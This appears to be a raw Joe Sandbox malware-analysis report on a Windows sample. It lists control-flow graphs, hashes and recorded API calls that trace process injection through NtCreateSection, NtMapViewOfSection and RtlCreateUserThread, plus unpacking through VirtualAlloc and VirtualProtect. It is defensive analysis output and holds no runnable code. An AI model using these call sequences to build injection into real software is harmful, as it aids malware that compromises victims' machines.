                                        control_flow_graph 0 417090-4170b8 2 4170c0-4170c7 0->2 3 4170c9-4170cb 2->3 4 4170cf-4170d5 2->4 3->4 5 4170d7-4170e1 4->5 6 4170e6-4170f0 4->6 5->6 7 4170f2-4170fe 6->7 8 417108-41710f 6->8 7->8 8->2 9 417111-417119 8->9 11 417120-417126 9->11 12 417134-41713b 11->12 13 417128-41712e 11->13 14 417141-417148 12->14 15 41713d 12->15 13->12 14->11 16 41714a-417151 14->16 15->14 17 417157-41726e InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW SetDefaultCommConfigW MoveFileA GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->17 18 41729e-4172ac 16->18 22 417270-417273 GetBoundsRect 17->22 23 417279-417280 17->23 19 4172b0-4172be SetCommState 18->19 24 4172c0-4172c7 19->24 25 4172c9-4172d0 19->25 22->23 26 417282-417289 OpenFileMappingA 23->26 27 41728f-41729b 23->27 24->19 24->25 28 4172d2-417339 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 25->28 29 41733f-41734e call 416cd0 25->29 26->27 27->18 28->29 34 417350-417361 29->34 35 41738d-417398 LoadLibraryA call 416d00 29->35 38 417370-417380 34->38 42 41739d-4173ae call 416ff0 35->42 40 417382 38->40 41 417388-41738b 38->41 40->41 41->35 41->38 46 4173b0-4173b7 42->46 48 4173c3-4173c9 46->48 49 4173b9-4173bf 46->49 50 4173d0-4173d7 48->50 51 4173cb call 416cf0 48->51 49->48 55 4173e6-4173ed 50->55 56 4173d9-4173e0 InterlockedDecrement 50->56 51->50 55->46 58 4173ef-4173ff 55->58 56->55 59 417400-417410 58->59 61 417412 59->61 62 417419-41741c 59->62 61->62 62->59 63 41741e-417429 62->63 64 417430-417435 63->64 66 417437-41743d 64->66 67 41743f-417445 64->67 66->67 68 417447-417454 66->68 67->64 67->68
                                        APIs
                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417160
                                        • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417179
                                        • FindAtomW.KERNEL32(00000000), ref: 00417180
                                        • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417188
                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004171A0
                                        • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 004171C7
                                        • MoveFileA.KERNEL32(004194C8,004194A8), ref: 004171D7
                                        • GetVersionExW.KERNEL32(?), ref: 004171E4
                                        • DisconnectNamedPipe.KERNEL32(?), ref: 004171F7
                                        • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041723C
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041724B
                                        • LCMapStringA.KERNEL32(00000000,00000000,004194D8,00000000,?,00000000), ref: 00417261
                                        • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 00417273
                                        • OpenFileMappingA.KERNEL32(00000000,00000000,00419508), ref: 00417289
                                        • SetCommState.KERNELBASE(00000000,00000000), ref: 004172B4
                                        • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004172E1
                                        • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004172F2
                                        • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004172FA
                                        • LoadLibraryA.KERNELBASE(00419530), ref: 00417392
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Console$CommFile$ReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectExchangeFindFontInterlockedLengthLibraryLoadMappingModuleMoveNameNamedOpenOutputPathPipeRectSearchSizeStateTypeVersion
                                        • String ID: k`$}$
                                        • API String ID: 2133105460-956986773
                                        • Opcode ID: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
                                        • Instruction ID: cef9a39308b5a98140bcba38773e80a9b25639b08e6fbc118f284f3ebe5161b8
                                        • Opcode Fuzzy Hash: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
                                        • Instruction Fuzzy Hash: 2291E372C45528ABC721AB61EC44ADF7B78EF49351F01806EF50AA7150CB381A86CFED

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 176 4018a5-4018b7 170->176 174 401595-4015be 171->174 175 401896 171->175 174->175 185 4015c4-4015db NtDuplicateObject 174->185 175->176 182 4018c5 176->182 183 4018bc-4018e3 call 401193 176->183 182->183 185->175 187 4015e1-401605 NtCreateSection 185->187 189 401661-401687 NtCreateSection 187->189 190 401607-401628 NtMapViewOfSection 187->190 189->175 191 40168d-401691 189->191 190->189 193 40162a-401646 NtMapViewOfSection 190->193 191->175 194 401697-4016b8 NtMapViewOfSection 191->194 193->189 196 401648-40165e 193->196 194->175 197 4016be-4016da NtMapViewOfSection 194->197 196->189 197->175 200 4016e0 call 4016e5 197->200
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 223 4018a5-4018b7 217->223 221 401595-4015be 218->221 222 401896 218->222 221->222 232 4015c4-4015db NtDuplicateObject 221->232 222->223 229 4018c5 223->229 230 4018bc-4018e3 call 401193 223->230 229->230 232->222 234 4015e1-401605 NtCreateSection 232->234 236 401661-401687 NtCreateSection 234->236 237 401607-401628 NtMapViewOfSection 234->237 236->222 238 40168d-401691 236->238 237->236 240 40162a-401646 NtMapViewOfSection 237->240 238->222 241 401697-4016b8 NtMapViewOfSection 238->241 240->236 243 401648-40165e 240->243 241->222 244 4016be-4016da NtMapViewOfSection 241->244 243->236 244->222 247 4016e0 call 4016e5 244->247
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectView
                                        • String ID:
                                        • API String ID: 1652636561-0
                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 267 4018a5-4018b7 261->267 265 401595-4015be 262->265 266 401896 262->266 265->266 276 4015c4-4015db NtDuplicateObject 265->276 266->267 273 4018c5 267->273 274 4018bc-4018e3 call 401193 267->274 273->274 276->266 278 4015e1-401605 NtCreateSection 276->278 280 401661-401687 NtCreateSection 278->280 281 401607-401628 NtMapViewOfSection 278->281 280->266 282 40168d-401691 280->282 281->280 284 40162a-401646 NtMapViewOfSection 281->284 282->266 285 401697-4016b8 NtMapViewOfSection 282->285 284->280 287 401648-40165e 284->287 285->266 288 4016be-4016da NtMapViewOfSection 285->288 287->280 288->266 291 4016e0 call 4016e5 288->291
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 306 4018a5-4018b7 300->306 304 401595-4015be 301->304 305 401896 301->305 304->305 315 4015c4-4015db NtDuplicateObject 304->315 305->306 312 4018c5 306->312 313 4018bc-4018e3 call 401193 306->313 312->313 315->305 317 4015e1-401605 NtCreateSection 315->317 319 401661-401687 NtCreateSection 317->319 320 401607-401628 NtMapViewOfSection 317->320 319->305 321 40168d-401691 319->321 320->319 323 40162a-401646 NtMapViewOfSection 320->323 321->305 324 401697-4016b8 NtMapViewOfSection 321->324 323->319 326 401648-40165e 323->326 324->305 327 4016be-4016da NtMapViewOfSection 324->327 326->319 327->305 330 4016e0 call 4016e5 327->330
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 346 4018a5-4018b7 340->346 344 401595-4015be 341->344 345 401896 341->345 344->345 355 4015c4-4015db NtDuplicateObject 344->355 345->346 352 4018c5 346->352 353 4018bc-4018e3 call 401193 346->353 352->353 355->345 357 4015e1-401605 NtCreateSection 355->357 359 401661-401687 NtCreateSection 357->359 360 401607-401628 NtMapViewOfSection 357->360 359->345 361 40168d-401691 359->361 360->359 363 40162a-401646 NtMapViewOfSection 360->363 361->345 364 401697-4016b8 NtMapViewOfSection 361->364 363->359 366 401648-40165e 363->366 364->345 367 4016be-4016da NtMapViewOfSection 364->367 366->359 367->345 370 4016e0 call 4016e5 367->370
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 401 402f97-402fbb 402 402fc1-402fd9 401->402 403 4030ee-4030f3 401->403 402->403 404 402fdf-402ff0 402->404 405 402ff2-402ffb 404->405 406 403000-40300e 405->406 406->406 407 403010-403017 406->407 408 403039-403040 407->408 409 403019-403038 407->409 410 403062-403065 408->410 411 403042-403061 408->411 409->408 412 403067-40306a 410->412 413 40306e 410->413 411->410 412->413 414 40306c 412->414 413->405 415 403070-403075 413->415 414->415 415->403 416 403077-40307a 415->416 416->403 417 40307c-4030eb RtlCreateUserThread NtTerminateProcess 416->417 417->403
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: CreateProcessTerminateThreadUser
                                        • String ID:
                                        • API String ID: 1921587553-0
                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 418 2cdfa88-2cdfaa1 419 2cdfaa3-2cdfaa5 418->419 420 2cdfaac-2cdfab8 CreateToolhelp32Snapshot 419->420 421 2cdfaa7 419->421 422 2cdfac8-2cdfad5 Module32First 420->422 423 2cdfaba-2cdfac0 420->423 421->420 424 2cdfade-2cdfae6 422->424 425 2cdfad7-2cdfad8 call 2cdf747 422->425 423->422 429 2cdfac2-2cdfac6 423->429 430 2cdfadd 425->430 429->419 429->422 430->424
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02CDFAB0
                                        • Module32First.KERNEL32(00000000,00000224), ref: 02CDFAD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CDC000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2cdc000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: 1425bd21019f149e12327d69b03b8d43886947c1d55cbc0c170fa328c4f98b17
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: A5F062352407146BD7203BB9AC8CB6A76E8BF89624F14052DE747958D0DB70E9454A61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 70 2c9003c-2c90047 71 2c90049 70->71 72 2c9004c-2c90263 call 2c90a3f call 2c90e0f call 2c90d90 VirtualAlloc 70->72 71->72 87 2c9028b-2c90292 72->87 88 2c90265-2c90289 call 2c90a69 72->88 90 2c902a1-2c902b0 87->90 92 2c902ce-2c903c2 VirtualProtect call 2c90cce call 2c90ce7 88->92 90->92 93 2c902b2-2c902cc 90->93 99 2c903d1-2c903e0 92->99 93->90 100 2c90439-2c904b8 VirtualFree 99->100 101 2c903e2-2c90437 call 2c90ce7 99->101 103 2c904be-2c904cd 100->103 104 2c905f4-2c905fe 100->104 101->99 106 2c904d3-2c904dd 103->106 107 2c9077f-2c90789 104->107 108 2c90604-2c9060d 104->108 106->104 110 2c904e3-2c90505 106->110 111 2c9078b-2c907a3 107->111 112 2c907a6-2c907b0 107->112 108->107 113 2c90613-2c90637 108->113 122 2c90517-2c90520 110->122 123 2c90507-2c90515 110->123 111->112 114 2c9086e-2c908be LoadLibraryA 112->114 115 2c907b6-2c907cb 112->115 116 2c9063e-2c90648 113->116 121 2c908c7-2c908f9 114->121 119 2c907d2-2c907d5 115->119 116->107 117 2c9064e-2c9065a 116->117 117->107 120 2c90660-2c9066a 117->120 124 2c90824-2c90833 119->124 125 2c907d7-2c907e0 119->125 128 2c9067a-2c90689 120->128 130 2c908fb-2c90901 121->130 131 2c90902-2c9091d 121->131 132 2c90526-2c90547 122->132 123->132 129 2c90839-2c9083c 124->129 126 2c907e2 125->126 127 2c907e4-2c90822 125->127 126->124 127->119 134 2c9068f-2c906b2 128->134 135 2c90750-2c9077a 128->135 129->114 136 2c9083e-2c90847 129->136 130->131 133 2c9054d-2c90550 132->133 137 2c905e0-2c905ef 133->137 138 2c90556-2c9056b 133->138 139 2c906ef-2c906fc 134->139 140 2c906b4-2c906ed 134->140 135->116 141 2c90849 136->141 142 2c9084b-2c9086c 136->142 137->106 144 2c9056d 138->144 145 2c9056f-2c9057a 138->145 146 2c9074b 139->146 147 2c906fe-2c90748 139->147 140->139 141->114 142->129 144->137 148 2c9059b-2c905bb 145->148 149 2c9057c-2c90599 145->149 146->128 147->146 154 2c905bd-2c905db 148->154 149->154 154->133
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C9024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: 30f393844056012b558bbd8fca14d04b5a4ced49d37317e27e8b9bbc93423008
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: 7E525874A01229DFDB64CF68C984BACBBB1BF09314F1480D9E94DAB351DB30AA95DF14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 372 417363-41736a 373 417370-417380 372->373 374 417382 373->374 375 417388-41738b 373->375 374->375 375->373 376 41738d-4173ae LoadLibraryA call 416d00 call 416ff0 375->376 381 4173b0-4173b7 376->381 382 4173c3-4173c9 381->382 383 4173b9-4173bf 381->383 384 4173d0-4173d7 382->384 385 4173cb call 416cf0 382->385 383->382 388 4173e6-4173ed 384->388 389 4173d9-4173e0 InterlockedDecrement 384->389 385->384 388->381 390 4173ef-4173ff 388->390 389->388 391 417400-417410 390->391 392 417412 391->392 393 417419-41741c 391->393 392->393 393->391 394 41741e-417429 393->394 395 417430-417435 394->395 396 417437-41743d 395->396 397 41743f-417445 395->397 396->397 398 417447-417454 396->398 397->395 397->398
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00419530), ref: 00417392
                                        • InterlockedDecrement.KERNEL32(?), ref: 004173E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: DecrementInterlockedLibraryLoad
                                        • String ID: k`$}$
                                        • API String ID: 1728580480-956986773
                                        • Opcode ID: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
                                        • Instruction ID: 92a10e5f27b6df14f57ef87c33efa73532c21aaf5ae15a36d787c78b43c6be55
                                        • Opcode Fuzzy Hash: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
                                        • Instruction Fuzzy Hash: 71213A31D482148BC7219B20E8917EA7B30EB48325F52447FDD8997251CB385CD5CB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 400 416d00-416e40 GetModuleHandleW GetProcAddress VirtualProtect
                                        APIs
                                        • GetModuleHandleW.KERNEL32(02B1AF70), ref: 00416DDF
                                        • GetProcAddress.KERNEL32(00000000,0041CF58), ref: 00416E1C
                                        • VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 00416E3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-3916222277
                                        • Opcode ID: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
                                        • Instruction ID: bfee18a85016a47b5ddbaf570877db746f2843951a7396f5e1c013fbe7522b0d
                                        • Opcode Fuzzy Hash: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
                                        • Instruction Fuzzy Hash: 4C315E559C93C4CAE301CBB8FC847553B63AB29744F408468D148CB3E2D7BA252AC76E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 431 2c90e0f-2c90e24 SetErrorMode * 2 432 2c90e2b-2c90e2c 431->432 433 2c90e26 431->433 433->432
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000400,?,?,02C90223,?,?), ref: 02C90E19
                                        • SetErrorMode.KERNELBASE(00000000,?,?,02C90223,?,?), ref: 02C90E1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: 7fbc46f90dc995f912efcc05dc9be36623145580ffa18c79cd6414e4195930d8
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: 5FD0123514512877DB002A94DC0DBCD7B1CDF05B66F008011FB0DD9080C770964046E5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 434 4018e6-40194b call 401193 Sleep call 40141f 448 40195a-4019a5 call 401193 434->448 449 40194d-401955 call 401514 434->449 449->448
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 463 401915-401918 464 4018c6-4018c7 463->464 465 40191a-40194b call 401193 Sleep call 40141f 463->465 466 4018d7 464->466 467 4018ce-4018e3 call 401193 464->467 477 40195a-4019a5 call 401193 465->477 478 40194d-401955 call 401514 465->478 466->467 478->477
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
